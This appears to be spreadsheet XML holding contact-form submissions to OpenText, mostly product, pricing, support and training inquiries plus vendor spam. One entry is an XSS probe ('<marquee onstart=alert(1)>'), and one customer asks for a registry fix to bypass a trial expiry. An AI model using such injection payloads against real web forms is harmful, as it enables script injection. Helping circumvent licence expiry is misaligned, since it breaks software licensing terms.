Je souhaite avoir plus d'informations sur la solution Fax: les specs, les fonctionnalités, les avantages par rapport à d'autres solutions similaires ,position sur le marché ..._x000D_
Comme je souhaite avoir une idée sur le prix de la solution pour une capacité d'environ 30 communications fax simultanées._x000D_
_x000D_
Merci.</t>
  </si>
  <si>
    <t>Currently a Right FAX customer.  Have a server on premises.  Need to find out about your Cloud FAX solution and cost.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are having issue with RightFax Add-ons running on Office 2016. Its a random issue when the user each the user launch Outlook the RightFax add-ons will fail to load. And once we re-enable it back it will last for the whole entire day. Please advise.</t>
  </si>
  <si>
    <t>Hi, we are a company in Spain working with several Law Firms. We want to learn how we can integrate our solution with yours._x000D_
Here you can see a demo of our product._x000D_
https://www.youtube.com/watch?v=ZOtdluwysEI_x000D_
_x000D_
Thank you._x000D_
César.</t>
  </si>
  <si>
    <t>We are on an old version of ApplicationXtender and need to determine if we need to upgrade and to what version</t>
  </si>
  <si>
    <t>I need pricing information for Documentum INFORMATION RIGHTS MANAGEMENT feature upgrade._x000D_
_x000D_
We already have Documentum_x000D_
We already have D2_x000D_
_x000D_
We need pricing for IRM</t>
  </si>
  <si>
    <t>Interested in OEM IHUB licensing</t>
  </si>
  <si>
    <t>Looking for an EDMS solution for our company.</t>
  </si>
  <si>
    <t>Hi, I am not getting the download link for trial version of Team Developer although it says that it has been mailed. _x000D_
Kindly check asap</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Our account manager/rep with OpenText used to be David Sims, but it seems he no longer works for your company. Our company purchased your ECM services._x000D_
_x000D_
We need BravaReader to open our TIF files that are produced by ECM (Scanning software). However there's a restriction with BravaReader where the program expires after 2 months and needs to be re-installed. _x000D_
_x000D_
1. Does OpenText have a free installer for their clients (ie. "us") that doesn't expire? Does it not come with our purchase?_x000D_
2. Is there a regfix we can use to bybass the 2 month expiry._x000D_
3. Can we simply reinstall the program every 2 months without consequence regarding licensing?_x000D_
_x000D_
Thank you,_x000D_
Patrick Joyce_x000D_
</t>
  </si>
  <si>
    <t>We are no longer a customer of your company - and have stopped using any of your products, can you please remove me from all mailing lists.</t>
  </si>
  <si>
    <t>I'd like to get pricing estimates for the Provision product.</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding my previous email, I received a response back from the vendor and they no longer sell this software through GSA. Since TeleForm is apparently not on the GSA contract, then I am asking for quote from you (I assume you would be the vendor) of a new TeleForm Desktop license. Thanks - Brett </t>
  </si>
  <si>
    <t>We currently have one license for a desktop installation of TeleForm (version 10.5) and are interested in getting a second license. It is apparently available through the GSA Purchasing Schedule, but the vendors know nothing about this software. It is unclear from the GSA Advantage website which specific product(s) we need – there are over 100 TeleForm related entries. Would the “TeleForm Desktop Bundle” (AU39-640) give us all of the modules? Or do we need to purchase Designer, Reader, Verifier, and ?? separately? And will we be able to verify forms designed on one desktop on the other one?</t>
  </si>
  <si>
    <t>Need to replace Desktop EDI software with another product.  Would like to know what options OpenText offers.</t>
  </si>
  <si>
    <t>We are working on a project to help manage all of our digital data.  This includes body-worn camera video, interview room video, external video, in-car video, pictures along with a wide array of other file types.  We need a system capable of digital evidence management (i.e. encryption, detailed auditing, redaction, etc.) and enterprise content management so we can digitize our workflows.  I am currently working on an RFI.</t>
  </si>
  <si>
    <t xml:space="preserve">Wrong address - please note:_x000D_
_x000D_
We received 2 letters with wrong addresses:_x000D_
1st Letter:_x000D_
Alphasys IT Services AG_x000D_
Jägerstrasse 2 --&gt; wrong street. Correct is: Technoparkstrasse 2, _x000D_
Winterthur CH 8406._x000D_
_x000D_
2. Letter:_x000D_
IT Services AG --&gt; wrong. correct is: Alphasys IT Services AG_x000D_
Jägerstrasse 2 --&gt; wrong. correct is: Technoparkstrasse 2_x000D_
Winterthur CH 8406_x000D_
_x000D_
Please delete the second address. It is the same company._x000D_
_x000D_
Thank you!_x000D_
Regards_x000D_
Daniela Bachmann_x000D_
</t>
  </si>
  <si>
    <t>Support in finding a root cause of unify database failure/corruption. Please let me know what details are required in order to start the investigation / contract number, database logs etc. We require this as soon as possible. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I am evaluating multiple solution for SAP data archiving and retrieving. I would like to assess the open text capabilities as well._x000D_
You can call me on -_x000D_
+919923420101 </t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
some of our employees use the software BravaDesktop_V7.1._x000D_
One of them has gotten a new pc, whereby its mac address has changed. So we need a new license for them and the new mac address has to be activated._x000D_
_x000D_
Old mac-address: 00-19-99-97-09-DC_x000D_
New mac-address: 50-9A-4C-52-B3-A6_x000D_
_x000D_
Thanks for your support!_x000D_
_x000D_
Best regards_x000D_
Sebastian Immerath</t>
  </si>
  <si>
    <t>I want to discuss about the placement drive for engineering students of our college.</t>
  </si>
  <si>
    <t>Guten Tag_x000D_
Wir erhalten immer noch Post von Opentext (US) obwohl wir schon lange nicht mehr Kunde sind. Können Sie bitte unsere Firma aus Ihrem Verteiler entfernen. Danke</t>
  </si>
  <si>
    <t>I am also interested in the 3-2202 OpenText Capture Center (OCC), do you know when it is available in Australia?</t>
  </si>
  <si>
    <t>I am interested in the 3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp, do you know when it is scheduled in Australia? I also need to know the price including your discounts etc.</t>
  </si>
  <si>
    <t>Hi, On 20/3/2017 we signed an Open Text Professional Services Agreement. We do not appear to have received a countersigned version from Open Text. Can you please provide a countersigned copy of the agreement for our records as soon as possible._x000D_
_x000D_
Thank you._x000D_
_x000D_
Cheers,_x000D_
Neala Fraser</t>
  </si>
  <si>
    <t>We are currently on version 7.1 of the Captiva/EMC product and want to upgrade to 7.5 however we need some training, etc.. to get us to there due to the changes in the product.  thank you</t>
  </si>
  <si>
    <t>Covisint is an Associate Member of CEA.  Our previous contact with your company has been with Ami Wood, HR Manager.  When I called 248-483-2019, the person I spoke with could find no record of Ami Wood.  I am now trying to get in touch with someone in your HR department to discuss your membership and encourage your use of the resources, training and tools that are available to your company through our website. Just FYI,  CEA did an AB1825 training for your staff at the San Francisco location in September of 2016.  I hope to hear from someone on your staff very soon.  Thank you!</t>
  </si>
  <si>
    <t>We are using the Teleform system currently. I have a technical question in regards to the Designer program. In regards to the Validations section for a form where you can mark the option to review a field if it falls in a certain range. I wanted to see if it's possible for only selected individuals to be the ones who could enter values if a field is identified as out of that range?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I was just doing some research and was wondering which SAP OCR languages are supported by Opentext?</t>
  </si>
  <si>
    <t>I am interested in the on demand training.  but my company only uses content suite and occ, is there a version of the on demand that only covers this?  if so, what is the pricing</t>
  </si>
  <si>
    <t>I have a fax2mail account and the credit card it was billing has changed.  The fax2mail # is 301-876-4142.  Please let me know how I can update credit card info.   Thanks</t>
  </si>
  <si>
    <t>Currently using RightFax and interested in hosted solution option.</t>
  </si>
  <si>
    <t>Terminate Customer Support Agreement at the end of 2017.  We do not wish to renew our support agreement.  The PSN is 419004891.  Contract #: USSC-15141-1.  Invoice 660519516</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Let me take this as an opportunity to introduce us. We Sublime Data Inc. are a lead generation company where we provide high-quality B-to-B data at an affordable cost which in turn helps companies to target their markets more effectively._x000D_
_x000D_
Would you be interested in reaching out to your target markets to generate new business partnerships?_x000D_
_x000D_
We can help you reach along with the job titles (any job titles like sales / IT/ operations / “C” level / manager / procurement / HR etc)._x000D_
_x000D_
Let me know the specific Industry/Geography/Job titles you want to target, I will send you counts, and pricing for your reference._x000D_
_x000D_
•	Email Appending: if you have any in-house list without emails or missing information, we can append that info to the same and deliver back to you._x000D_
_x000D_
I look forward to doing business with you._x000D_
_x000D_
Regards,_x000D_
Peter Thomas</t>
  </si>
  <si>
    <t>I need a copy of your w-9 for your tax id to pay your billing please.</t>
  </si>
  <si>
    <t>Explore Magellan product to integrate with existing AI bot application.</t>
  </si>
  <si>
    <t>Looking to see if we have support for Senco Brands in Cincinnati Ohio for rightfax._x000D_
_x000D_
Thank You,_x000D_
_x000D_
Mike Britton</t>
  </si>
  <si>
    <t>We require an FSA/EDC Compliant Document Management System for a client in Sweden. Please contact asap by tomorrow</t>
  </si>
  <si>
    <t>Can someone please look into our bill. There is an outstanding balance we would like to pay. I cannot get a response from Nefeli Topouza. Our Contract # is 0012271816.</t>
  </si>
  <si>
    <t>please forward this to Mr. Jefrey Penarijo - jpenarij@opentext.com_x000D_
and remove us from your spam list._x000D_
It is very urgent to communicate via emails. is regarding_x000D_
NEW REQUEST | RM0026665088 EUR | GREECE | GXS NEW AS2 CONNECTION Orphee Beinoglou SA – SILVER</t>
  </si>
  <si>
    <t>Formerly worked with HP ExStream software at CareFirst Blue Cross Blue Shield, and looking to demo and introduce ExStream capabilities to Blue Cross NC.  _x000D_
_x000D_
Leave voicemail if no answer and I will return call when able to do so.</t>
  </si>
  <si>
    <t>Hi there, We are looking for a document management system for our Legal department, which will be used globally by up to 30k Users. We have a high level requirement catalog and I wonder if somebody from your company can get in touch with me to schedule a demo session of your product.</t>
  </si>
  <si>
    <t>Hello,_x000D_
As part of a European project we would like to give access to FC as the communication tool to the project partners.  Could we purchase another domain name to use for the project instead of the one we use as an individual organisation?  If yes can we get opentext support for this._x000D_
Thanks,_x000D_
Denise</t>
  </si>
  <si>
    <t>Would like to partner for a good multi channel web content mgt system</t>
  </si>
  <si>
    <t xml:space="preserve">es wäre sehr nett von Ihnen, wenn uns irgendjemand sagt, wo wir den Lizenzkey bekommen können. Der Kauf hat prima geklappt, allerdings wäre es noch schöner, wenn wir das Programm (Brava Desktop) auch benutzen könnten._x000D_
Gruß_x000D_
B.Krystolik </t>
  </si>
  <si>
    <t>I need information on upgrading our eDocs installation to the current version as well as API documentation for the version we currently have operating, which is OpenText eDocs DM 10 API._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marc</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
            _x000D_
We recently finished working on a research graphic “Land Rover: Sales, Market Growth &amp; Profits (Infographic)”, which I figured I’d share with you in case you felt it worth posting on your site._x000D_
Here’s the web address: https://www.getoffroad.com/blog/infographics/land-rover-sales,-market-growth-profits-(infographic)_x000D_
_x000D_
If you are interested to post this infographic on your site, then I can prepare a small and unique summary/introduction para to go along with the graphic._x000D_
 	_x000D_
Feel free to pass the graphic along your readers. Either way, I’ve enjoyed your posts and look forward to keeping an eye on it going forward. _x000D_
 	_x000D_
Keep up the good work!    _x000D_
 	_x000D_
Best regards,_x000D_
Rebecca Taylor_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">For some reason I'm am no longer allowed to access the My Support page of my own site. This was possible till a the 6th of July, after which I went on vacation for a few weeks. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen,_x000D_
We have received 3 cover letters from you and the address is not correct. Please send us only 1 cover letter with the correct address. Pay attention to the correct spelling of the street. Correct would be:_x000D_
Oskar-Messter-Strasse 29, 85737 Ismaning .Please, look for the dashes. Many Thanks. Best regards Lourdes Gallardo_x000D_
</t>
  </si>
  <si>
    <t>We would like to have an introduction of OpenText's solutions for BPM/ECM.</t>
  </si>
  <si>
    <t>No reason</t>
  </si>
  <si>
    <t>Require information for the certification course 3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp. I intend to appear in the certification exam and request proper guidelines on the examination.</t>
  </si>
  <si>
    <t>Web-based and On-Site Training schedules and pricing. Prefer Instructor led Web-Based, virtual lab training. _x000D_
4-4905 Process Platform Fundamentals 10.x_x000D_
2-4912 Entity Modeling for Process Platform v16_x000D_
4-4913 Process Modeling for Process Platform v16_x000D_
3-4903 Process Platform Administration_x000D_
3-0300 OpenText Directory Services (OTDS) Installation and Configuration</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello and good morning_x000D_
_x000D_
I am Sam Wilson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Sam Wilson_x000D_
</t>
  </si>
  <si>
    <t>We are planning to replace Research &amp; Deveopment document management system because current system is aging._x000D_
One of business requirements is to restrict download, capture screen and print, and BRAVA! for SharePoint will be the good solution to realize it._x000D_
We want to use your product but it doesn't support our company's IT standard environments especially Windows server 2016 and SharePoint 2016._x000D_
If you can start supporting these versions by October 2017, we would like to buy 300 license._x000D_
_x000D_
Thank you very much for your consideration.</t>
  </si>
  <si>
    <t>We have received a letter regarding "Important Announcement from OpenText" about your digital transformation and upgrade of ERP system.  As the letter was not addressed to any specific person, I'm not sure which of our departments in the firm uses your service/product.  I would appreciate if you could advise us your contact person and direct your letters to that contact/department accordingly to ensure your messages get directed correctly.  In this case, could you tell me who this letter should be delivered to and I can forward it accordingly.  Thank you.</t>
  </si>
  <si>
    <t>URGENT - please reply with the bank details for Open Text AG, It is a EURO payment._x000D_
Thank you_x000D_
Best regards_x000D_
Karina Hougaard</t>
  </si>
  <si>
    <t xml:space="preserve">Is there any trial version available for Teamsite? </t>
  </si>
  <si>
    <t>I want to know how can I access to LAPI API page, but I don't have permission. To access, "Product line" "End User Number" "System ID" is required. How can I check this ?</t>
  </si>
  <si>
    <t xml:space="preserve">Kiwibank is due to renew OpenText Host Explorer on 31 august, and we have been informed by our Reseller that the price will increase significantly. Are you able to let us know the % increase and provide a quote. for Host Explorer Maintenance Renewal 1 year (200-499 Licences) * Win Licence. _x000D_
Kind regards,_x000D_
ITSoftwareManagement@kiwibank.co.nz </t>
  </si>
  <si>
    <t>I am interested in the 3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp training and wanted to know whether our organisation has included training in the contract agreement. DHS currently use OpenText Viewer, OpenText VIM, Business Work Center.</t>
  </si>
  <si>
    <t>Hi, I'm representing a startup company wishing to utilize a BPM platform, I'm interesting in the pricing model for a development environment at this stage as we're unsure about if / when we will be productionised, happy to dicuss, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Understand all about MDM </t>
  </si>
  <si>
    <t>FOIP Service/ Demo</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Australia!_x000D_
_x000D_
I represent Platinum Accounting &amp; Taxation, platinumaccounting.com.au provides professional Accounting and Tax services in VIC, Australia. We help_x000D_
businesses in Tax Returns, Cloud Accounting &amp; Business Tax planning. _x000D_
_x000D_
I am contacting you to see if you might be interested in linking our website from your resource page or blog page. _x000D_
_x000D_
_x000D_
We can write original, high quality content about Tax Advises, Professional Accounting, or other related topics so that you can post on your blog along _x000D_
with a link to our website. Let me know if you would be willing to accept our guest post or image link in your website? _x000D_
_x000D_
If you have any question, please feel free to ask._x000D_
_x000D_
Thanks_x000D_
_x000D_
Corinne _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">37th Edition _x000D_
_x000D_
GITEX TECHNOLOGY WEEK_x000D_
8-12 October 2017_x000D_
Dubai World Trade Centre_x000D_
DUBAI, United Arab Emirates_x000D_
www.gitex.com_x000D_
_x000D_
_x000D_
_x000D_
GITEX, the event for transformative global technology_x000D_
_x000D_
GITEX also boasted the largest MENA Government presence of any show in the Middle East._x000D_
_x000D_
147,133 attendees | 4473 exhibitors I 97 Countries_x000D_
</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I was curious to know if you would be interested in reaching Episerver Users for your marketing._x000D_
_x000D_
We can also help you to reach other products of Episerver, please let me know your requirement._x000D_
_x000D_
_x000D_
Thanks and appreciate your time._x000D_
_x000D_
Sophia</t>
  </si>
  <si>
    <t>We have a client that is looking for an efax solution.  We are looking at OpenText CloudFax.  I am looking for pricing or the information that you will need in order to provide a quote._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Jill from AudioEye referred us for PDF remediation. We would like to get a quote and a description of the process. </t>
  </si>
  <si>
    <t>Cannot print faxes at this time....?</t>
  </si>
  <si>
    <t>Have Opentext Exceed v 14.  Interested in upgrade and technical support maintenance.</t>
  </si>
  <si>
    <t>Having problems opening the downloaded trial. IT department  ran the .exe file, it finished downloading. There are files for iHub on my computer, but no icon to open the program. Is this program run in conjunction with eclipse or another program? Need some help getting started. Thanks.</t>
  </si>
  <si>
    <t>Evaluation for purchase. We are interested in cloud based solutions that meet the ECM capabilities and be able to integrate with Salesforce and other Financial applications.</t>
  </si>
  <si>
    <t>Would like to schedule a demo for the week of August 14, 2017.</t>
  </si>
  <si>
    <t>deseo integrar sus soluciones a mis clientes</t>
  </si>
  <si>
    <t>I need to discuss a quote for the cloud version of OpenText for 10 users._x000D_
_x000D_
Thanks,_x000D_
Walter</t>
  </si>
  <si>
    <t>Hello, _x000D_
I'm reviewing OpenText ™ agellan and I want to know in detail this solution, please can you provide me more information like manuals and a demo._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,  _x000D_
_x000D_
I would like to connect with the person who looking after to book meeting space or events?  If you can please forward my email to the right person or forward me the information and I much appreciate it._x000D_
_x000D_
Regards,_x000D_
_x000D_
Felix</t>
  </si>
  <si>
    <t>Need Instructor Led Training in Germany for 3 colleagues for Open Text SAP Document presentment Bootcamp</t>
  </si>
  <si>
    <t>I am reaching out to you about IT training and Certifications. _x000D_
I work with all branches of the DOD including the Army, Navy, Air Force &amp; Marines, Coast Guard, the U.S. Civilian Government including DISA, NIH &amp; SSA, and the Intelligence Community including NSA, CIA &amp; FBI, and numerous private companies and universities including AT&amp;T, IKEA, Johns Hopkins University &amp; Lockheed Martin._x000D_
• We Can train on-site, we host classes at our training center and travel worldwide._x000D_
• We take pride in the delivery of training and recognize that this is a student’s career and not just a class._x000D_
• We also understand that not all companies need the same detailed training, WE TAILOR our training to fits our client’s specific needs. _x000D_
• High percentage of pass rate._x000D_
_x000D_
Please feel free to contact me! I am positive I have a program to fit your staff development and continuing education requirements. Let me know if you'd like a course catalog.._x000D_
_x000D_
My Best,_x000D_
Sandra Jones,_x000D_
240-667-7611_x000D_
443-623-3711_x000D_
sjones@phoenixts.com</t>
  </si>
  <si>
    <t>To know the details of the internship</t>
  </si>
  <si>
    <t>I am looking for the release notes for content server 10. I found related material on your site but not the release notes. Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">Left a message for Michael Strickland,   Annin has 600 UPC codes that need to get set up at Boscovs.com </t>
  </si>
  <si>
    <t>On the page of "OpenText Content Suite Training Offerings" it says: 3-0715 Archive Center Installation and Administration (formerly 3-0700 and 3-0701) v16 - New! _x000D_
On the course details page of "Courses &amp; Workshops/ 3-0702 Archive Server Advanced Administration (formerly 715)" it onlys says formerly 715 and as prerequisites 3-0700. What is true?</t>
  </si>
  <si>
    <t xml:space="preserve">Need to have technical architecture and sizing rules. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Verification of employment_x000D_
_x000D_
Dear Sir/Madam,_x000D_
 _x000D_
HireRight is a background screening company appointed by one of the Clients to verify information for the purposes of a pre-employment screening report and have been asked to confirm employment of one of your former employees._x000D_
 _x000D_
Please note that due to the Data Protection Act I cannot disclose any information concerning the Candidate in this e-mail as it can be released only to Human Resources or the person responsible for providing references. _x000D_
_x000D_
Could you please forward this e-mail to the relevant person/department or please provide the appropriate contact details and I will send the request for verification with the Candidate's details and the signed authorization._x000D_
 _x000D_
_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
_x000D_
KONRAD SZCZERBA | Service Delivery Team | Uniwersytecka 18 | Katowice, PL_x000D_
+44 1273760933 Tel | 502 0125 Internal Direct | Fax  1273760587_x000D_
</t>
  </si>
  <si>
    <t>If have worked with you when I worked at CSC and we are now looking in offering the German Navy Open Text Exceed via IBM and I would like to receive an Offer from you_x000D_
Kind Regards,_x000D_
Rink-Jan Blank</t>
  </si>
  <si>
    <t>Our customer would like a demo of StreamServe.  They are using ERP LN FP5.  Please contact me for more details and to set up a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">Advice/Information_x000D_
_x000D_
I have been asked to look in to the possibility of updating our existing StreamServe setup (v.5.5.0 build 1922)._x000D_
I am getting a bit confused on what the next system to update to is best; 5.6 or the CCE?_x000D_
Could someone please advice me on what our options are?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Opentext implementation.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Can you please tell me where I can find the presentations from EW2017? Usually the slide decks from the breakout sessions are available for download.</t>
  </si>
  <si>
    <t>Demo Request</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madame,_x000D_
I am contacting you to obtain more information about the OpenText Capture Center Software, the technical specifications, and other relevant information about the capabilities of the tool. _x000D_
We look forward to automating the process of Sales Orders creation consisting on extracting the relevant information from purchase orders sent by customers, and creating the corresponding sales orders in SAP. The issue is that we receive the purchase orders in all types of formats (Excel, Word, PDF, TXT), and the layout changes from customer to customer (i.e. there is not a standard form)._x000D_
Would the OpenText Capture Center Software be able to manage this?_x000D_
Thank you in advance for your confirmation._x000D_
Respectfully,_x000D_
</t>
  </si>
  <si>
    <t>Need urgent help to respond to an RFP from an important healthcare client based in California. The RFP requires us to provide an already developed cloud-based archiving system and desktop application that will be used as a tool to archive, retrieve, and hyperlink existing and future drawing plans, Operations and Maintenance Manuals, and warranty documents. However, the RFP has extensive security requirements, and we will need your urgent inputs to help us respond to this one. Thanks.</t>
  </si>
  <si>
    <t>Dear Sir, we received a letter regarding an important announcement from Opentext for LANexpert and Pragmantic, please take note that these two companies don't existe anymore,  please don't send any letter at this address. Thanking you in advance for your comprehension. Yours sincerely, Swisscom SA - Reception</t>
  </si>
  <si>
    <t>My present email address is about to change and I would like to keep my fax number but link the fax number to my new mail address. Would this be possible? Hope to hear from you regarding this</t>
  </si>
  <si>
    <t>&lt;marquee onstart=alert(1)&gt;</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Zuge einer Evaluierung von Softwareprodukten zum automatischen Befüllen von fertigen PDF-Formularen, bin ich in unserem Hause auf Ihre Software gestoßen._x000D_
_x000D_
Leider konnte mir bisher niemand mitteilen ob mit Ihrer Softwarelösung (Exstream) auch schon fertige PDFs ausgefüllt werden können?_x000D_
_x000D_
Das ganze muss in einer bestehenden C++ Anwendung implementierbar sein._x000D_
_x000D_
Vielen Dank für Ihre Bemühung und_x000D_
mit freundlichen Grüßen_x000D_
_x000D_
Kevin Gath</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are evaluating Omega geophysical software which uses exceed and secure shell for launching  Linux applications from windows.  Could you please provide us with a trial version for two mounts for secure ssh and exceed so that we could test Omega in windows environment during this period?_x000D_
_x000D_
Best Regards,_x000D_
Pavel._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Dear Luci Valero, _x000D_
we were part of group Novabase, now we are in Vinci Ernergies Group and we need to have EDOCS, from what I know you can sell us the software and licenses and than we can request some developments to Novabase, is that right?_x000D_
Can you send us prices and conditions?_x000D_
Thanks in advance, _x000D_
Paulo Linares</t>
  </si>
  <si>
    <t xml:space="preserve">I need a proposal ASAP for Migration Services with OpenText </t>
  </si>
  <si>
    <t xml:space="preserve">Request for Quotation - OpenText Migration </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sir/Mamdam,_x000D_
_x000D_
we want to find some planforms which includeing the APPNEXUS premium traffic with your data analysis service. I am wondering whether you can offer the help ? looking forward your reply. thanks for reading._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Ma'am,_x000D_
I being the Placement coordinator of one of the renowned technological University Visvesvaraya Technological University located in Karnataka, India. I kindly request you to provide me with contact details regarding Campus Recruitment to be organized in our institute. Looking forward for your kind response_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested to partnership with OPENTEXT to provide opentext solution to our customers. Please let us know the process to move forward._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Win Win HR Consultancy Dubai - Eager to Join hands...!!!</t>
  </si>
  <si>
    <t xml:space="preserve">Hej!_x000D_
_x000D_
Jag skriver till er på uppdrag av Teknologisk Institut AB, som i höst gör konferensen Kundservice. Vi vill nå rätt personer med information och undrar om ni kan ge oss kontaktinformation för er Kundcenterchef, och möjligen en medarbetare på Kundservice._x000D_
_x000D_
_x000D_
Tack på förhand._x000D_
_x000D_
_x000D_
Med vänlig Hälsning_x000D_
Dastan Rashid_x000D_
</t>
  </si>
  <si>
    <t>Request meeting to discuss insights and difficulty with BDC &amp; Communitech Funding for EconomyTech Innovation -see WorthwhileInc.com ...</t>
  </si>
  <si>
    <t xml:space="preserve">*Please excuse the duplicate request - have rectified my email address and contact number.*_x000D_
_x000D_
Inquiry regarding your "OpenText Capture Center" product, please may you advise regarding licensing and pricing options. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry regarding your "OpenText Capture Center" product. Please may you advise regarding licencing and pricing options for this product. Thank you. </t>
  </si>
  <si>
    <t>Please provide me access for support</t>
  </si>
  <si>
    <t>Job requirement with 1 year of experience in manual testing in IBM India Pvt Ltd. and 6 months of experience in automation testing in opentext Hyderabad</t>
  </si>
  <si>
    <t>Requirement for Manual tester with 1.6 year of experience</t>
  </si>
  <si>
    <t>I need to find an upgrade path for one of my clients they are currently using Application Xtender 5.25</t>
  </si>
  <si>
    <t>Hello - I'm trying to get help with uploads on the GXS. I cannot find a contact on that site, so it took me to here._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>How can I access and use Magellan?_x000D_
What are the costs associated with the software?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope this finds you well._x000D_
_x000D_
Would having a targeted list of Guidance Software  users add Impact to your marketing campaigns and lead generation initiatives to close more sales opportunities?_x000D_
_x000D_
We have an exclusive data set of Guidance Software  technology users. Should this be interest to you, please email me back. _x000D_
_x000D_
Data fields provided: Install base Information | Company Name |Web Address | Contact Name | Job Title | Phone Number | Direct Business Emails | Postal address | Industry | Employee Size | Revenue Size | SIC Code |Fax Number | LinkedIn Handles._x000D_
_x000D_
Job Responsibility: C-Level (CEO/CIO/CTO/COO/VP), Director/Department Head, Manager/Supervisor, Consultant, IS/IT, and Other._x000D_
_x000D_
Further, we can also assist you to target - HP users, IBM FileNet users, Documentum users, Alfresco users, Kofax users, OnBase by Hyland users, Oracle WebCenter users, Box Users, Splunk users, Xerox DocuShare users, and Laserfiche users_x000D_
_x000D_
Please let me know your specific requirement and I’ll get back to you with further database specifications._x000D_
_x000D_
What’s the best way to get on your calendar for 10 minutes to discuss more about our database capabilities? _x000D_
_x000D_
Appreciate your time and look forward to hearing back from you._x000D_
_x000D_
Warm Regards, _x000D_
Ms. Julia De Francesco_x000D_
Demand Generation Team _x000D_
Tel: 512-354-3912_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need scanning of 3,00 surveys.</t>
  </si>
  <si>
    <t>High price of Learning Subsciption.</t>
  </si>
  <si>
    <t>Do you have a version of Exceed that runs on Windows 10?  We have been a long time user of this product and I was forced to upgrade my VM to run Windows 10.  Thanks</t>
  </si>
  <si>
    <t>Wir (IT Dienstleister) benötigen für meherere Kunden eine zuverlässige Fax Lösung. Idealerweise mit 24x7 Support._x000D_
Anbindungen an Microsoft AX oder SAP sind ebenso unser Zielgebiet wie die Integratrion in Microsoft Exchange und die Integration von MFP Geräten. Ebenfalls soll ein direkter Druck möglich sein._x000D_
Auch Cluoud Szenarien (neben On Prem) im SInne von Hybridlösungen sind im Fokus._x000D_
Wir suchen hier einen starken und zuverlässigen Partner</t>
  </si>
  <si>
    <t>Hello,&lt;br&gt;_x000D_
I have a project based on Angular 2.x as front end &amp;amp; Laravel PHP for backend. How can I use BIRT as my reporting engine within such architecture.</t>
  </si>
  <si>
    <t>I am interested in a User Guide for RightFax.  Please email to me if you have one we should be using for RightFax.  Thank you!</t>
  </si>
  <si>
    <t>My startup company is plannig to evaluate BIRT as reportimg engine through a project based on Angular 2.x as front end &amp; Laravel PHP for backend. How can I use BIRT as my reporting engine within such architecture?</t>
  </si>
  <si>
    <t xml:space="preserve">we have request an upgrade license file to Infor_x000D_
and we have received this mail_x000D_
Infor Key Request _x000D_
This is an automatically generated email - please do not reply. _x000D_
_x000D_
Dear manuel santos,_x000D_
 _x000D_
Welcome to and thank you for choosing Infor. _x000D_
_x000D_
A key request has been completed for the following: _x000D_
Customer Code:	1~70219-L_x000D_
Customer Name:	Boucheron Holding_x000D_
Contact:	manuel santos_x000D_
Key ID:	503973_x000D_
 _x000D_
Please find below / attached the key for your order. _x000D_
_x000D_
Please contact OpenText.com to request upgrade license file. Infor only delivers the original license, all upgrades are provided by OpenText. Our agreement with the Partner restricts us to the initial license delivery only. _x000D_
_x000D_
could you please provide the key upgrade _x000D_
thanks  </t>
  </si>
  <si>
    <t>We're working with a vendor currently to complete the implementation of the OpenText solution, however, we'd like to establish a plan for support and user training moving forward.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to be contacted by someone regarding the eDOCS product from Opentext.  My division is looking to acquire software for legal document management.  I've called and left two messages; but didn't hear anything back.  _x000D_
_x000D_
Thanks, _x000D_
-Matt</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
          I am looking for training options for Workflow design.  From beginning to advanced.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
Scott_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To use initially </t>
  </si>
  <si>
    <t>Bonjour, Nous avons un projet d'extranet clients au sein de notre structure. Nous allons lancer un appel d'offre, je souhaiterais pouvoir avoir un contact chez Open text avec qui m'entretenir en vue de cet envoi.  _x000D_
Cordialement, Marion Bonadei</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Are you interested in acquiring Printed Electronics companies database which includes complete contact details and verified email addresses of :-_x000D_
_x000D_
CEO's, CTO's, VP's, Presidents, Managing directors, Engineers/Scientists, Consultants, Sales &amp; Marketing, Academics, and many more._x000D_
_x000D_
